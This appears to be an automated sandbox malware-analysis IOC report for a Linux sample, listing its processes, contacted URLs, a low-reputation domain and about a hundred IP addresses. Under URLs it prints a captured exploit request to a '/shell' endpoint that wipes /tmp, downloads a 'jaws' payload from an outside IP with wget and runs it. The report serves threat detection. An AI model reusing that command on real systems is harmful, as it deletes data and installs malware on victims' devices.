Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

n/a

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

n/a

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

n/a

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

n/a

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

n/a

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

n/a

/tmp/db0fa4b8db0333367e9bda3ab68b8042.x86

n/a

/usr/bin/xfce4-panel

n/a

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libwhiskermenu.so 1 8388646 whiskermenu "Whisker Menu" "Show a menu to easily access installed applications"

/usr/bin/xfce4-panel

n/a

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 4 8388653 systray "Notification Area" "Area where notification icons appear"

/usr/bin/xfce4-panel

n/a

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 5 8388654 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0

n/a

/usr/sbin/xfpm-power-backlight-helper

/usr/sbin/xfpm-power-backlight-helper --get-max-brightness

/usr/bin/dbus-daemon

n/a

/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd

/usr/bin/dbus-daemon

n/a

/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd

There are 10 hidden processes, click here to show them.

URLs

Name

Malicious

http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+212.193.30.245/jaws;sh+/tmp/jaws

213.24.83.10

Details

Name:	http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+212.193.30.245/jaws;sh+/tmp/jaws
IP:	213.24.83.10
TargetID:	-1
From Memory:	false
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)	Networking

http://212.193.30.245/bin

unknown

Details

Name:	http://212.193.30.245/bin
TargetID:	26489
From Memory:	true
Source:	db0fa4b8db0333367e9bda3ab68b8042.x86, 6779.1.0000000008048000.000000000805b000.r-x.sdmp

Signature Hits	Behavior Group	Mitre Attack
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking

http://schemas.xmlsoap.org/soap/encoding/

unknown

Details

Name:	http://schemas.xmlsoap.org/soap/encoding/
TargetID:	26489
From Memory:	true
Source:	db0fa4b8db0333367e9bda3ab68b8042.x86, 6779.1.0000000008048000.000000000805b000.r-x.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
URLs found in memory or binary data	Networking

http://schemas.xmlsoap.org/soap/envelope/

unknown

Details

Name:	http://schemas.xmlsoap.org/soap/envelope/
TargetID:	26489
From Memory:	true
Source:	db0fa4b8db0333367e9bda3ab68b8042.x86, 6779.1.0000000008048000.000000000805b000.r-x.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
HTTP GET or POST without a user agent	Networking
URLs found in memory or binary data	Networking

Domains

Name

Malicious

api.cashapi.xyz

212.193.30.245

Details

Name:	api.cashapi.xyz
IP:	212.193.30.245
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Performs DNS queries to domains with low reputation	Networking
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
HTTP GET or POST without a user agent	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Posts data to webserver	Networking	Application Layer Protocol Non-Application Layer Protocol
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

156.235.45.179

unknown

Seychelles

156.56.148.25

unknown

United States

160.160.9.214

unknown

Morocco

197.10.113.5

unknown

Tunisia

109.20.138.55

unknown

France

156.216.92.25

unknown

Egypt

41.175.162.112

unknown

South Africa

164.225.163.112

unknown

United States

152.110.186.224

unknown

South Africa

37.233.98.125

unknown

Poland

42.72.141.205

unknown

Taiwan; Republic of China (ROC)

109.151.139.187

unknown

United Kingdom

41.143.104.38

unknown

Morocco

197.12.199.87

unknown

Tunisia

138.139.122.147

unknown

United States

34.117.160.28

unknown

United States

156.65.187.98

unknown

United States

148.38.214.158

unknown

United States

41.71.222.53

unknown

Nigeria

109.165.204.48

unknown

Bosnia and Herzegowina

115.18.198.47

unknown

Korea Republic of

103.16.89.226

unknown

China

113.65.120.231

unknown

China

213.50.24.110

unknown

Sweden

81.89.137.60

unknown

United Kingdom

14.73.4.158

unknown

Korea Republic of

147.155.164.68

unknown

United States

115.124.8.6

unknown

Australia

154.117.112.88

unknown

Nigeria

156.100.32.224

unknown

United States

145.106.186.110

unknown

Netherlands

109.175.65.223

unknown

Bosnia and Herzegowina

220.58.199.81

unknown

Japan

219.86.3.234

unknown

Taiwan; Republic of China (ROC)

109.170.87.102

unknown

Russian Federation

146.152.1.115

unknown

United States

98.200.11.53

unknown

United States

197.66.206.56

unknown

South Africa

156.69.212.23

unknown

New Zealand

5.70.237.212

unknown

United Kingdom

123.142.144.14

unknown

Korea Republic of

210.106.86.102

unknown

Korea Republic of

194.50.24.65

unknown

Russian Federation

103.30.88.232

unknown

Indonesia

123.22.248.34

unknown

Viet Nam

150.199.122.201

unknown

United States

118.211.239.158

unknown

Australia

42.7.192.239

unknown

China

117.12.214.160

unknown

China

178.247.166.1

unknown

Turkey

197.90.49.92

unknown

South Africa

157.182.20.26

unknown

United States

64.60.19.225

unknown

United States

69.164.235.158

unknown

United States

204.156.18.76

unknown

United States

210.28.112.157

unknown

China

117.188.149.133

unknown

China

223.86.209.224

unknown

China

123.0.16.114

unknown

Bangladesh

63.243.65.86

unknown

United States

210.162.26.25

unknown

Japan

180.193.2.52

unknown

Philippines

63.58.53.56

unknown

United States

202.138.111.136

unknown

India

43.109.235.46

unknown

Japan

117.97.172.124

unknown

India

78.211.212.49

unknown

France

95.227.19.78

unknown

Italy

178.200.56.63

unknown

Germany

161.195.174.53

unknown

United States

202.133.114.113

unknown

Japan

102.233.173.123

unknown

2.255.34.221

unknown

Sweden

197.5.249.194

unknown

Tunisia

77.24.233.249

unknown

Germany

68.55.86.12

unknown

United States

41.57.121.209

unknown

Nigeria

79.208.52.225

unknown

Germany

67.127.118.168

unknown

United States

178.103.145.208

unknown

United Kingdom

39.221.88.106

unknown

Indonesia

200.47.223.247

unknown

Venezuela

121.39.5.182

unknown

China

25.15.214.15

unknown

United Kingdom

113.229.229.45

unknown

China

206.47.198.218

unknown

Canada

193.67.59.15

unknown

Netherlands

41.32.98.108

unknown

Egypt

178.65.37.121

unknown

Russian Federation

39.201.95.78

unknown

Indonesia

41.110.216.160

unknown

Algeria

123.219.236.142

unknown

Japan

117.182.251.101

unknown

China

130.78.16.133

unknown

Netherlands

117.60.217.100

unknown

China

5.72.153.235

unknown

Iran (ISLAMIC Republic Of)

212.222.240.78

unknown

United Kingdom

156.93.179.202

unknown

United States

60.171.28.2

unknown

China

94.178.33.147

unknown

Ukraine

There are 90 hidden IPs, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report

Processes

URLs

Domains

IPs